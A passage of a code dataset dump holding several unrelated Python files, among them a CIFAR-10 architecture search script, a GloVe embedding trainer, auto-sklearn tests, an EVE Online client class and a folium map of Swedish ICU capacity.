action='store_true')\nparser.add_argument('--validation_frequency', type=int, default=1)\nparser.add_argument('--print_frequency', type=int, default=10)\nparser.add_argument('--n_worker', type=int, default=32)\n\n\"\"\" net config \"\"\"\nparser.add_argument('--depth', type=int, default=92) # 74\nparser.add_argument('--alpha', type=int, default=48) # 48 84\n\nparser.add_argument('--bn_momentum', type=float, default=0.1)\nparser.add_argument('--bn_eps', type=float, default=1e-3)\nparser.add_argument('--dropout', type=float, default=0)\nparser.add_argument('--enable_mix', action='store_true')\nparser.add_argument('--share_mix_layer', action='store_true')\nparser.add_argument('--share_classifier', action='store_true')\nparser.add_argument('--enable_init_mix', action='store_true')\nparser.add_argument('--fix_determined', action='store_true')\n\nparser.add_argument('--pretrained_epochs', type=int, default=5)\nparser.add_argument('--pretrained_batch', type=int, default=128)\nparser.add_argument('--determined_train', action='store_true')\nparser.add_argument('--re_init', type=str, default='last_determined', choices=['last_determined', 'determined_part', 'no_reinit'])\nparser.add_argument('--determined_train_epoch', type=int, default=20)\nparser.add_argument('--determined_train_batch', type=int, default=128)\n\n\"\"\" shared hyper-parameters \"\"\"\nparser.add_argument('--target_hardware', type=str, default=None, choices=['cpu', 'gpu1', None])\nparser.add_argument('--reg_loss_type', type=str, default='add', choices=['add', 'mul'])\nparser.add_argument('--reg_loss_acc', type=float, default=0.9) # reg_loss_params\nparser.add_argument('--reg_loss_latency', type=float, default=0.1) # reg_loss_params\n\nif __name__ == '__main__':\n args = parser.parse_args()\n\n torch.manual_seed(args.manual_seed)\n torch.cuda.manual_seed_all(args.manual_seed)\n np.random.seed(args.manual_seed)\n\n os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu\n\n os.makedirs(args.path, exist_ok=True)\n\n # build run config from args\n args.lr_schedule_param = None\n args.opt_param = {\n 'momentum': args.momentum,\n 'nesterov': not args.no_nesterov,\n }\n run_config = Cifar10RunConfig(\n **args.__dict__\n )\n\n # args.conv_candidates = [\n # '3x3_MBConv1', '3x3_MBConv2', '3x3_MBConv3', '3x3_MBConv4', '3x3_MBConv5', '3x3_MBConv6',\n # '5x5_MBConv1', '5x5_MBConv2', '5x5_MBConv3', '5x5_MBConv4', '5x5_MBConv5', '5x5_MBConv6',\n # '7x7_MBConv1', '7x7_MBConv2', '7x7_MBConv3', '7x7_MBConv4', '7x7_MBConv5', '7x7_MBConv6',\n # ]\n\n args.conv_candidates = [\n '3x3_SEMBConv1', '3x3_SEMBConv2', '3x3_SEMBConv3', '3x3_SEMBConv4', '3x3_SEMBConv5', '3x3_SEMBConv6',\n '5x5_SEMBConv1', '5x5_SEMBConv2', '5x5_SEMBConv3', '5x5_SEMBConv4', '5x5_SEMBConv5', '5x5_SEMBConv6',\n '7x7_SEMBConv1', '7x7_SEMBConv2', '7x7_SEMBConv3', '7x7_SEMBConv4', '7x7_SEMBConv5', '7x7_SEMBConv6',\n ]\n\n # args.conv_candidates = [\n # '3x3_SEMBConv1', '3x3_SEMBConv2', '3x3_SEMBConv3', '3x3_SEMBConv4', '3x3_SEMBConv5', '3x3_SEMBConv6',\n # '5x5_SEMBConv1', '5x5_SEMBConv2', '5x5_SEMBConv3', '5x5_SEMBConv4', '5x5_SEMBConv5', '5x5_SEMBConv6',\n # '7x7_SEMBConv1', '7x7_SEMBConv2', '7x7_SEMBConv3', '7x7_SEMBConv4', '7x7_SEMBConv5', '7x7_SEMBConv6',\n # 'Bottleneck_3x3Conv_Expand0', 'Bottleneck_3x3Conv_Expand1', 'Bottleneck_3x3Conv_Expand2',\n # 'Bottleneck_5x5Conv_Expand0', 'Bottleneck_5x5Conv_Expand1', 'Bottleneck_5x5Conv_Expand2',\n # 'Bottleneck_7x7Conv_Expand0', 'Bottleneck_7x7Conv_Expand1', 'Bottleneck_7x7Conv_Expand2',\n # ]\n\n # args.conv_candidates = [\n # 'Bottleneck_3x3Conv_Expand0', 'Bottleneck_3x3Conv_Expand1', 'Bottleneck_3x3Conv_Expand2',\n # 'Bottleneck_5x5Conv_Expand0', 'Bottleneck_5x5Conv_Expand1', 'Bottleneck_5x5Conv_Expand2',\n # 'Bottleneck_7x7Conv_Expand0', 'Bottleneck_7x7Conv_Expand1', 'Bottleneck_7x7Conv_Expand2',\n # ]\n\n # args.conv_candidates = [\n # 'Bottleneck_3x3Conv_Expand0', 'Bottleneck_3x3Conv_Expand1', 'Bottleneck_3x3Conv_Expand2',\n # 'Bottleneck_5x5Conv_Expand0', 'Bottleneck_5x5Conv_Expand1', 'Bottleneck_5x5Conv_Expand2',\n # 'Bottleneck_7x7Conv_Expand0', 'Bottleneck_7x7Conv_Expand1', 'Bottleneck_7x7Conv_Expand2',\n # 'Bottleneck_11x11Conv_Expand0', 'Bottleneck_11x11Conv_Expand1', 'Bottleneck_11x11Conv_Expand2',\n # ]\n\n # args.conv_candidates = [\n # 'BasicBlock_3x3Conv_Expand0', 'BasicBlock_3x3Conv_Expand1',\n # 'BasicBlock_5x5Conv_Expand0', 'BasicBlock_5x5Conv_Expand1',\n # 'BasicBlock_7x7Conv_Expand0', 'BasicBlock_7x7Conv_Expand1',\n # ]\n\n # args.conv_candidates = [\n # 'BasicBlock_3x3Conv_Expand0', 'BasicBlock_3x3Conv_Expand1',\n # 'BasicBlock_5x5Conv_Expand0', 'BasicBlock_5x5Conv_Expand1',\n # 'BasicBlock_7x7Conv_Expand0', 'BasicBlock_7x7Conv_Expand1',\n # 'BasicBlock_11x11Conv_Expand0', 'BasicBlock_11x11Conv_Expand1',\n # ]\n\n super_net = SuperProgressiveNASNets(\n depth=args.depth, alpha=args.alpha, conv_candidates=args.conv_candidates,\n n_classes=run_config.data_provider.n_classes, bn_param=(args.bn_momentum, args.bn_eps),\n dropout_rate=args.dropout, enable_mix=args.enable_mix, share_mix_layer=args.share_mix_layer,\n share_classifier=args.share_classifier, enable_init_mix=args.enable_init_mix,\n fix_determined=args.fix_determined\n )\n\n if args.reg_loss_type == 'add':\n args.reg_loss_params = {\n 'w_acc': args.reg_loss_acc,\n 'w_latency': args.reg_loss_latency,\n }\n arch_search_config = ProgressiveArchSearchConfig(**args.__dict__)\n\n print('Run config:')\n for k, v in run_config.config.items():\n print('\\t%s: %s' % (k, v))\n print('Architecture Search config:')\n for k, v in arch_search_config.config.items():\n print('\\t%s: %s' % (k, v))\n\n # arch search run manager\n arch_search_run_manager = ArchSearchRunManager(args.path, super_net, run_config, arch_search_config)\n\n # resume\n if args.resume:\n try:\n arch_search_run_manager.load_model()\n except Exception as e:\n print('fail to load models: %s' % e)\n\n if arch_search_run_manager.pretrain:\n arch_search_run_manager.init_train(pretrain_epochs=args.pretrained_epochs,\n pretrained_batch=args.pretrained_batch)\n\n # training\n arch_search_run_manager.train(args.re_init)\n","sub_path":"cifar10_arch_search.py","file_name":"cifar10_arch_search.py","file_ext":"py","file_size_in_byte":8710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"439130140","text":"import sys\nfrom PyQt5.QtWidgets import QApplication, QWidget, QDialog\n#This code just displays one GUI element \n\n\n\n#import the module created in the qtdesigner\nfrom dialog1 import Ui_InitalDialog\nfrom dialog2 import Ui_Dialog2\nfrom dialog3 import Ui_Dialog3\n\nclass AppWindow1(QDialog):\n def __init__(self):\n super(QDialog, self).__init__()\n self.ui = Ui_InitalDialog()\n self.ui.setupUi(self)\n self.show()\n\nclass AppWindow2(QDialog):\n def __init__(self):\n super(QDialog, self).__init__()\n self.ui = Ui_Dialog2()\n self.ui.setupUi(self)\n self.show()\nclass AppWindow3(QDialog):\n def __init__(self):\n super(QDialog, self).__init__()\n self.ui = Ui_Dialog3()\n self.ui.setupUi(self)\n self.show()\n\n#show the window on PC\napp = QApplication(sys.argv)\n#switch case to define which window shall be opend\nw = AppWindow1()\n#w = AppWindow2()\n#w = AppWindow3()\n#End of switch case\nw.show()\nsys.exit(app.exec_())\n#End of showing window on PC","sub_path":"GUI/app_show1.py","file_name":"app_show1.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"528878661","text":"d={\r\n \"key\": 3,\r\n \"foo\": {\r\n \"a\": 5,\r\n \"bar\": {\r\n \"baz\": 8\r\n }\r\n }\r\n}\r\ndef apna_fun(dd, separator ='.', prefix =''): \r\n return { prefix + separator + k if prefix else k : v \r\n \r\n for kk, vv in dd.items() \r\n for k, v in apna_fun(vv, separator, kk).items() \r\n } if type(dd)==dict else { prefix : dd } \r\n \r\n\r\nprint ( (apna_fun(d))) \r\n\r\n\r\n","sub_path":"nested_dict1.py","file_name":"nested_dict1.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"50525140","text":"# coding=utf-8\nfrom random import randint\n\n\nclass Player(object):\n def __init__(self, name):\n self.name = name\n self.price = randint(1000, 9000)\n self.training = False\n self.vacation = False\n\n def onTraining(self):\n self.training = True\n return self.training\n\n def onVacation(self):\n self.vacation = True\n return self.vacation\n\n def getPrice(self):\n return self.price\n\n def status(self):\n return (self.vacation or self.training)\n\n\nclass Manager(object):\n def __init__(self, player):\n self.managed_player = player\n print('Managing Player: {}'.format(self.managed_player.name))\n\n def send_player_on(self, typee):\n if typee in ['vacation', 'training']:\n if typee == 'vacation':\n print('Sending player: {} on vacation'.format(self.managed_player.name))\n self.managed_player.onVacation()\n else:\n print('Sending player: {} on training'.format(self.managed_player.name))\n self.managed_player.onTraining()\n else:\n print('Can\\'t send player on: {}, it\\'s not a valid option!'.format(typee))\n\n def sell_player(self, offer):\n print('The price of the player is: {}'.format(self.managed_player.getPrice()))\n if offer > self.managed_player.getPrice():\n print('Saying goodbye to {}'.format(self.managed_player.name))\n else:\n print('Saying No to the offer, as the player {} is more valuable!'.format(self.managed_player.name))\n\nif __name__ == '__main__':\n fballer = Player('Daniel')\n mgr = Manager(fballer)\n\n # mgr.send_player_on('vacation')\n mgr.send_player_on('training')\n\n mgr.sell_player(1000)\n","sub_path":"Proxy/Proxy.py","file_name":"Proxy.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"491995628","text":"import numpy as np\nimport tensorflow as tf\nfrom tqdm import tqdm\nimport itertools\nimport random\nimport os\nimport pickle\nimport argparse\nfrom collections import defaultdict\n\nclass GloVe(tf.keras.Model):\n def __init__(self, save_dir, embedding_dim=256, max_vocab_size=1000, scaling_factor=0.75, batch_size=512, num_epochs=50, learning_rate=0.01):\n super(GloVe, self).__init__()\n self.embedding_dim = embedding_dim\n self.max_vocab_size = max_vocab_size\n self.scaling_factor = scaling_factor\n self.batch_size = batch_size\n self.num_epochs = num_epochs\n\n self.vocab_size = 0\n self.concept2id = None\n self.comap = None\n self.comatrix = None\n self.optimizer = tf.keras.optimizers.Adagrad(learning_rate=learning_rate)\n self.save_dir = save_dir\n self.epoch_loss_avg = []\n \n def buildCoMatrix(self, patient_record):\n self.concept2id = build_dict(count_unique(patient_record))\n self.vocab_size = len(self.concept2id.keys())\n self.comap = defaultdict(float)\n self.comatrix = np.zeros((self.vocab_size, self.vocab_size), dtype=np.float64)\n\n for i in tqdm(range(len(patient_record))):\n patient = patient_record[i]\n for p in patient:\n for k in patient:\n if p != k:\n self.comap[(p, k)] += 1\n \n for pair, count in self.comap.items():\n self.comatrix[self.concept2id[pair[0]], self.concept2id[pair[1]]] = count\n\n def initParams(self):\n with tf.device(\"/cpu:0\"):\n \"\"\"must be implemented with cpu-only env since this is sparse updating\"\"\"\n self.target_embeddings = tf.Variable(tf.random.uniform([self.vocab_size, self.embedding_dim], 0.1, -0.1),\n name=\"target_embeddings\")\n self.context_embeddings = tf.Variable(tf.random.uniform([self.vocab_size, self.embedding_dim], 0.1, -0.1),\n name=\"context_embeddings\")\n self.target_biases = tf.Variable(tf.random.uniform([self.vocab_size], 0.1, -0.1),\n name='target_biases')\n self.context_biases = tf.Variable(tf.random.uniform([self.vocab_size], 0.1, -0.1),\n name=\"context_biases\")\n\n def computeCost(self, x):\n with tf.device(\"/gpu:0\"):\n \"\"\"x = [target_ind, context_ind, co_occurrence_count]\"\"\"\n target_emb = tf.nn.embedding_lookup([self.target_embeddings], x[0])\n context_emb = tf.nn.embedding_lookup([self.context_embeddings], x[1])\n target_bias = tf.nn.embedding_lookup([self.target_biases], x[0])\n context_bias = tf.nn.embedding_lookup([self.context_biases], x[1])\n\n weight = tf.math.minimum(1.0, tf.math.pow(tf.math.truediv(x[2], tf.cast(self.max_vocab_size, dtype=tf.float32)), self.scaling_factor))\n \n emb_product = tf.math.reduce_sum(tf.math.multiply(target_emb, context_emb), axis=1)\n log_cooccurrence = tf.math.log(tf.add(tf.cast(x[2], dtype=tf.float32), 1))\n \n distance_cost = tf.math.square(\n tf.math.add_n([emb_product, target_bias, context_bias, tf.math.negative(log_cooccurrence)]))\n \n batch_cost = tf.math.reduce_sum(tf.multiply(weight, distance_cost))\n \n return batch_cost\n\n def computeGradients(self, x):\n with tf.GradientTape() as tape:\n cost = self.computeCost(x)\n return cost, tape.gradient(cost, self.trainable_variables)\n\n def prepareBatch(self):\n i_ids = []\n j_ids = []\n co_occurs = []\n comap_list = list(self.comap.items())\n\n for pair, co_occur in comap_list:\n i_ids.append(self.concept2id[pair[0]])\n j_ids.append(self.concept2id[pair[1]])\n co_occurs.append(co_occur)\n \n assert len(i_ids) == len(j_ids), \"The length of the data are not the same\"\n assert len(i_ids) == len(co_occurs), \"The length of the data are not the same\"\n return i_ids, j_ids, co_occurs\n\n def getEmbeddings(self):\n self.embeddings = self.target_embeddings + self.context_embeddings\n \n def saveEmbeddings(self, epoch, avg_loss):\n self.getEmbeddings()\n np.save(os.path.join(self.save_dir, \"glove_emb_e{:03d}_loss{:.4f}.npy\".format(epoch, avg_loss)),\n self.embeddings)\n print(\"Embedding results have been saved in the output path\")\n\n def saveConcept2id(self):\n with open(self.save_dir + \"/concept2id_glove.pkl\", \"wb\") as f:\n pickle.dump(self.concept2id, f)\n print(\"concept2id successfully saved in the output path\")\n\n def trainModel(self):\n i_ids, j_ids, co_occurs = self.prepareBatch()\n total_batch = int(np.ceil(len(i_ids) / self.batch_size))\n cost_avg = tf.keras.metrics.Mean()\n\n for epoch in range(self.num_epochs):\n progbar = tf.keras.utils.Progbar(len(i_ids))\n \n for i in range(total_batch):\n i_batch = i_ids[i * self.batch_size : (i+1) * self.batch_size]\n j_batch = j_ids[i * self.batch_size : (i+1) * self.batch_size]\n co_occurs_batch = co_occurs[i * self.batch_size : (i+1) * self.batch_size]\n cost, gradients = self.computeGradients([i_batch, j_batch, co_occurs_batch])\n self.optimizer.apply_gradients(zip(gradients, self.trainable_variables))\n cost_avg(cost) \n progbar.add(self.batch_size)\n print(\"Step {}: Loss: {:.4f}\".format(self.optimizer.iterations.numpy(), cost))\n \n if (epoch % 1) == 0: \n avg_loss = cost_avg.result()\n print(\"Epoch {}: Loss: {:.4f}\".format(epoch, avg_loss))\n self.epoch_loss_avg.append(avg_loss)\n \n self.saveEmbeddings(epoch, avg_loss)\n self.saveConcept2id()\n\ndef load_data(data_dir):\n with open(data_dir, 'rb') as f:\n my_data = pickle.load(f)\n return my_data\n\ndef count_unique(patient_record):\n \"\"\"count unique concpets in the patient record\"\"\"\n concept_list = []\n for visit in patient_record:\n concept_list.extend(visit)\n return list(set(concept_list))\n\ndef build_dict(patient_record):\n unique_concept = count_unique(patient_record)\n my_dict = dict()\n\n for i in range(len(unique_concept)):\n my_dict[unique_concept[i]] = i\n\n return my_dict\n\ndef parse_arguments(parser):\n parser.add_argument(\"--input\", type=str, help=\"The path of training data\")\n parser.add_argument(\"--output\", type=str, help=\"The path to output results\")\n parser.add_argument(\"--dim\", type=int, default=200, help=\"The dimension of embeddings\")\n parser.add_argument(\"--max_vocab\", type=int, default=1000, help=\"The maximum vocabulary size\")\n parser.add_argument(\"--scaling_factor\", type=float, default=0.75, help=\"The scaling factor\")\n parser.add_argument(\"--batch_size\", type=int, default=512000, help=\"Training batch size\")\n parser.add_argument(\"--num_epochs\", type=int, default=50, help=\"Training epochs\")\n parser.add_argument(\"--learning_rate\", type=float, default=0.01, help=\"Learning rate for Adagrad optimizer\")\n args = parser.parse_args()\n return args\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n args = parse_arguments(parser)\n\n training_data = load_data(args.data_dir)\n GloVe_model = GloVe(args.output, args.dim, args.max_vocab, args.scaling_factor, args.batch_size, args.num_epochs, args.learning_rate)\n GloVe_model.buildCoMatrix(training_data)\n GloVe_model.initParams()\n GloVe_model.trainModel()","sub_path":"src/GloVe.py","file_name":"GloVe.py","file_ext":"py","file_size_in_byte":7808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"464082613","text":"#===============================================================================\r\n# $Header: /Tools/Build/Build.py 2 1/17/02 9:21a Ryan $\r\n#\r\n# DESCRIPTION: This is a GUI for constructing and editing.\r\n#\r\n# ORIGINAL AUTHOR: Ryan Donahue\r\n#===============================================================================\r\nimport Tkinter, Pmw\r\nfrom Tools.Build import BuildApi\r\nfrom Tools.Build import BuildWizard\r\nfrom Tools.Build import BuildGUI\r\n\r\nTRUE = 1\r\nFALSE = 0\r\n\r\n\r\nclass Gui:\r\n\r\n def __init__ (self, root, parent=None):\r\n self.__firstRun = TRUE\r\n self.root = root\r\n if parent:\r\n self.parent = parent\r\n else:\r\n self.parent = root\r\n self.frame = Tkinter.Frame (self.parent)\r\n self.frame.pack()\r\n\r\n \"Create a notebook consisting of a construction page and an editing page.\"\r\n # Create the notebook.\r\n notebook = Pmw.NoteBook(self.parent, raisecommand=self.__LoadPage)\r\n notebook.pack(fill = 'both', expand = 1, padx = 10, pady = 10) \r\n\r\n # Create the perform page. \r\n page = notebook.add ('Perform')\r\n self.__performPage = BuildGUI.Gui (self.root, page)\r\n\r\n # Create the editing page.\r\n page = notebook.add ('Edit')\r\n self.__editPage = BuildWizard.Gui (self.root, page)\r\n \r\n notebook.setnaturalsize()\r\n self.__firstRun = FALSE\r\n \r\n\r\n def __LoadPage (self, pageName):\r\n if self.__firstRun:\r\n return\r\n if pageName == \"Perform\":\r\n self.__performPage.LoadBuilds()\r\n else:\r\n self.__editPage.LoadPage()\r\n \r\n \r\n \r\n\r\n \r\n####################################################################\r\nif __name__ == '__main__':\r\n root = Tkinter.Tk()\r\n Pmw.initialise(root, fontScheme = 'pmw1')\r\n root.title(\"Builds\")\r\n root.geometry ( \"%dx%d%+d%+d\" % (600, 500, 50, 50 ) )\r\n\r\n exitButton = Tkinter.Button(root, text = 'Exit', command = root.destroy)\r\n exitButton.pack(side = 'bottom')\r\n widget = Gui(root)\r\n root.mainloop()\r\n","sub_path":"Tools/Build/Build.pyw","file_name":"Build.pyw","file_ext":"pyw","file_size_in_byte":2117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"166438372","text":"# -*- encoding: utf-8 -*-\nimport os\n\nimport numpy as np\nimport ParamSklearn.util as putil\n\nimport autosklearn\nfrom autosklearn.util.backend import Backend\nfrom autosklearn.constants import *\nfrom base import Base\n\n\nclass ArrayReturningDummyPredictor(object):\n def __init__(self, test):\n self.arr = test\n\n def predict_proba(self, X):\n return self.arr\n\nclass EstimatorTest(Base):\n _multiprocess_can_split_ = True\n\n def test_fit(self):\n output = os.path.join(self.test_dir, '..', '.tmp_estimator_fit')\n self._setUp(output)\n\n X_train, Y_train, X_test, Y_test = putil.get_dataset('iris')\n automl = autosklearn.AutoSklearnClassifier(time_left_for_this_task=12,\n per_run_time_limit=12,\n tmp_folder=output,\n output_folder=output)\n automl.fit(X_train, Y_train)\n score = automl.score(X_test, Y_test)\n print(automl.show_models())\n\n self.assertGreaterEqual(score, 0.8)\n self.assertEqual(automl._task, MULTICLASS_CLASSIFICATION)\n\n del automl\n self._tearDown(output)\n\n def test_pSMAC_wrong_arguments(self):\n self.assertRaisesRegexp(ValueError,\n \"If shared_mode == True tmp_folder must not \"\n \"be None.\",\n autosklearn.AutoSklearnClassifier,\n shared_mode=True)\n\n self.assertRaisesRegexp(ValueError,\n \"If shared_mode == True output_folder must not \"\n \"be None.\",\n autosklearn.AutoSklearnClassifier,\n shared_mode=True,\n tmp_folder='/tmp/duitaredxtvbedb')\n\n def test_fit_pSMAC(self):\n output = os.path.join(self.test_dir, '..', '.tmp_estimator_fit_pSMAC')\n self._setUp(output)\n\n X_train, Y_train, X_test, Y_test = putil.get_dataset('iris')\n\n automl = autosklearn.AutoSklearnClassifier(time_left_for_this_task=15,\n per_run_time_limit=15,\n output_folder=output,\n tmp_folder=output,\n shared_mode=True,\n seed=1,\n initial_configurations_via_metalearning=0,\n ensemble_size=0)\n automl.fit(X_train, Y_train)\n\n # Create a 'dummy model' for the first run, which has an accuracy of\n # more than 99%; it should be in the final ensemble if the ensemble\n # building of the second AutoSklearn classifier works correct\n true_targets_ensemble_path = os.path.join(output, '.auto-sklearn',\n 'true_targets_ensemble.npy')\n true_targets_ensemble = np.load(true_targets_ensemble_path)\n true_targets_ensemble[-1] = 1 if true_targets_ensemble[-1] != 1 else 0\n probas = np.zeros((len(true_targets_ensemble), 3), dtype=float)\n for i, value in enumerate(true_targets_ensemble):\n probas[i, value] = 1.0\n dummy_predictions_path = os.path.join(output, '.auto-sklearn',\n 'predictions_ensemble',\n 'predictions_ensemble_1_00030.npy')\n with open(dummy_predictions_path, 'wb') as fh:\n np.save(fh, probas)\n\n probas_test = np.zeros((len(Y_test), 3), dtype=float)\n for i, value in enumerate(Y_test):\n probas_test[i, value] = 1.0\n\n dummy = ArrayReturningDummyPredictor(probas_test)\n backend = Backend(output, output)\n backend.save_model(dummy, 30, 1)\n\n automl = autosklearn.AutoSklearnClassifier(time_left_for_this_task=10,\n per_run_time_limit=10,\n output_folder=output,\n tmp_folder=output,\n shared_mode=True,\n seed=2,\n initial_configurations_via_metalearning=0,\n ensemble_size=0)\n automl.fit(X_train, Y_train)\n automl.run_ensemble_builder(0, 1, 50).wait()\n\n score = automl.score(X_test, Y_test)\n\n self.assertEqual(len(os.listdir(os.path.join(output, '.auto-sklearn',\n 'ensemble_indices'))), 1)\n self.assertGreaterEqual(score, 0.95)\n self.assertEqual(automl._task, MULTICLASS_CLASSIFICATION)\n\n del automl\n self._tearDown(output)\n\n","sub_path":"test/automl/test_estimators.py","file_name":"test_estimators.py","file_ext":"py","file_size_in_byte":5050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"207661374","text":"#Embedded file name: eve/client/script/environment/spaceObject\\spewContainer.py\n\"\"\"\nSpaceObject code for Spew Container\n\"\"\"\nimport blue\nimport geo2\nimport audio2\nfrom eve.client.script.environment.spaceObject.spaceObject import SpaceObject\nimport evegraphics.settings as gfxsettings\nimport hackingcommon.hackingConstants as hackingConst\n\nclass SpewContainer(SpaceObject):\n \"\"\"\n This class wraps client balls that are spew containers\n \"\"\"\n\n def __init__(self):\n super(SpewContainer, self).__init__()\n self.explodeOnRemove = True\n\n def Assemble(self):\n self.UnSync()\n if self.model is not None:\n self.model.ChainAnimationEx('NormalLoop', 0, 0, 1.0)\n self.spewFX = self.LoadFX()\n slimItem = self.typeData.get('slimItem')\n if slimItem.hackingSecurityState is not None:\n state = slimItem.hackingSecurityState\n else:\n state = hackingConst.hackingStateSecure\n self.SetSecurityState(state)\n self.SetupSharedAmbientAudio()\n self.SetStaticRotation()\n\n def SetSecurityState(self, securityState):\n \"\"\"\n Sets the security state on this container and applies animations accordingly.\n \"\"\"\n if securityState == hackingConst.hackingStateBeingHacked:\n self.TriggerAnimation('hacking')\n elif securityState == hackingConst.hackingStateHacked:\n self.TriggerAnimation('empty')\n elif securityState == hackingConst.hackingStateSecure:\n self.TriggerAnimation('idle')\n\n def PlaySpewEffect(self, spewCone):\n if self.model:\n self.ClearFX(self.model, self.spewFX)\n self.PlayFX(self.model, self.spewFX, spewCone)\n self.PlaySoundFX(self.model, spewCone)\n else:\n self.LogError('PlaySpewEffect failed - no model exists for the space object!')\n\n def PlaySoundFX(self, targetObject, spewCone):\n position, direction = spewCone\n audioEmitter = audio2.AudEmitter(targetObject.name + '_src')\n translatedPosition = geo2.Vec3Add(targetObject.worldPosition, position)\n audioEmitter.SetPosition(direction, translatedPosition)\n audioEmitter.SetAttenuationScalingFactor(10000)\n audioEmitter.SendEvent('scattering_spew_play')\n\n def LoadFX(self):\n \"\"\"\n Loads and returns the graphics effect for spewing\n \"\"\"\n spewGraphicsID = 20306\n graphicEntry = cfg.graphics.Get(spewGraphicsID)\n fx = blue.resMan.LoadObject(graphicEntry.graphicFile)\n return fx\n\n def ClearFX(self, targetObject, fx):\n \"\"\"\n Removes any existing spew effect from the target object\n \"\"\"\n for obj in list(targetObject.children):\n if obj.name == fx.name:\n targetObject.children.remove(obj)\n\n def PlayFX(self, targetObject, fx, spewCone):\n \"\"\"\n Playes the spew effect on the target object, using the information supplied in the spewCone\n \"\"\"\n position, direction = spewCone\n targetObject.children.append(fx)\n fx.scaling = (2000.0, 3000.0, 2000.0)\n rotation = geo2.QuaternionRotationArc((0.0, 1.0, 0.0), direction)\n fx.translation = position\n fx.rotation = rotation\n for curveSet in fx.curveSets:\n curveSet.scale = 0.15\n curveSet.PlayFrom(0.2)\n\n def Explode(self):\n if not gfxsettings.Get(gfxsettings.UI_EXPLOSION_EFFECTS_ENABLED):\n return False\n explosionURL, (delay, scaling) = self.GetExplosionInfo()\n return SpaceObject.Explode(self, explosionURL=explosionURL, managed=True, delay=delay, scaling=scaling)\n","sub_path":"eve/client/script/environment/spaceObject/spewContainer.py","file_name":"spewContainer.py","file_ext":"py","file_size_in_byte":3672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"424164443","text":"# -*- coding: utf-8 -*-\n\"\"\"\nRead data for optimization\n\"\"\"\nimport pandas as pd\nfrom datetime import date\nimport folium\n \ndef read_and_process_data(trend_data, region_data, today = date(2020,4,3)):\n \n # Read forecast\n fc_df = pd.read_csv(trend_data,sep=\",\")\n fc_df.iva_corrected.fillna(fc_df.predicted, inplace=True)\n fc_df = fc_df.rename(columns={\"date\": \"Date\", \"iva_corrected\": \"IVA\"})\n fc_df.Region = fc_df.Region.apply(lambda x: x.replace(\"Region \", \"\"))\n fc_df = fc_df.replace(\"Örebro län\", \"Örebro\")\n fc_df = fc_df.replace(\"Jönköpings län\", \"Jönköping\")\n fc_df = fc_df.replace(\"Kalmar län\", \"Kalmar\")\n\n # Read region data\n region_df = pd.read_csv(region_data,sep=\";\")\n region_df.Region = region_df.Region.apply(lambda x: x.replace(\"Region \", \"\"))\n\n # Extract current still image\n current_df = fc_df[fc_df[\"Date\"] == today.strftime(\"%Y-%m-%d\")]\n\n # Merge current_df with region data\n current_df = current_df.merge(region_df, on=['Region'], how='left')\n\n # Process current_df\n current_df[\"UnderCapacity\"] = current_df[\"IVA\"] - current_df[\"Capacity\"]\n current_df[\"UnderCapacity\"] = current_df[\"UnderCapacity\"].apply(lambda x: max(0,x))\n current_df[\"SurplusCapacity\"] = current_df[\"Capacity\"] - current_df[\"IVA\"]\n current_df[\"SurplusCapacity\"] = current_df[\"SurplusCapacity\"].apply(lambda x: max(0,x))\n current_df[\"Rate\"] = current_df[\"IVA\"] / current_df[\"Capacity\"]\n current_df = current_df.set_index(current_df.Region)\n\n # Region data\n trend_dict = {}\n for d in list(region_df.Region):\n data = fc_df[fc_df.Region==d]\n data = data.groupby('Date').sum().reset_index()\n data['Date']=pd.to_datetime(data['Date'])\n data = data.sort_values(by=['Date'], ascending=False)\n trend_dict[d] = data\n \n return current_df, trend_dict\n\ndef plot_initial_state(current_df,geojson):\n \n # Initiate map\n m = folium.Map(location=[62, 20], zoom_start=5)\n \n # Define styling rules for counties\n def style_function(feature):\n d = feature['properties']['name'] \n \n if current_df.at[d,\"Rate\"] < 0.5:\n if current_df.at[d,\"SurplusCapacity\"] > 3:\n color = '#7AA826' #green\n else: \n color = '#FFCA2D' #yellow\n elif 0.5 <= current_df.at[d,\"Rate\"] < 0.9:\n color='#FFCA2D' #yellow\n elif 0.9 <= current_df.at[d,\"Rate\"] <= 1:\n color='#EA830E' #orange \n elif 1 < current_df.at[d,\"Rate\"]:\n color='#BF2C2A' #red\n \n return {'fillOpacity': 0.4,'weight': 0.5,\n 'color': 'black','fillColor': color}\n \n # Import geojson data and apply styling rule\n folium.GeoJson(\n geojson,\n name='geojson',\n style_function=style_function\n ).add_to(m)\n \n # Add a clickable circle to each county\n for idx, row in current_df.iterrows(): \n \n # Define styling rules\n if row.Rate < 0.5:\n if row.SurplusCapacity > 3:\n color = '#7AA826' #green\n else: \n color = '#FFCA2D' #yellow\n elif 0.5 <= row.Rate < 0.9:\n color='#FFCA2D' #yellow\n elif 0.9 <= row.Rate <= 1:\n color='#EA830E' #orange\n elif 1 < row.Rate:\n color='#BF2C2A' #red\n \n # Draw circle\n folium.Circle(\n radius= 7000 + row.IVA*200,\n location=[row.Lat, row.Long],\n popup=folium.Popup('<b>'+row.Region+'</b><br>'+\\\n '<br>Patienter: '+str(row.IVA)+\\\n '<br>Kapacitet: '+str(row.Capacity),\n max_width=450,min_width=150),\n color=color,\n fill=True,\n fill_color=color,\n tooltip=\"Klicka här!\",\n ).add_to(m)\n \n from branca.element import Template, MacroElement\n\n template = \"\"\"\n {% macro html(this, kwargs) %}\n\n <!doctype html>\n <html lang=\"en\">\n <head>\n <meta charset=\"utf-8\">\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n <title>jQuery UI Draggable - Default functionality\n 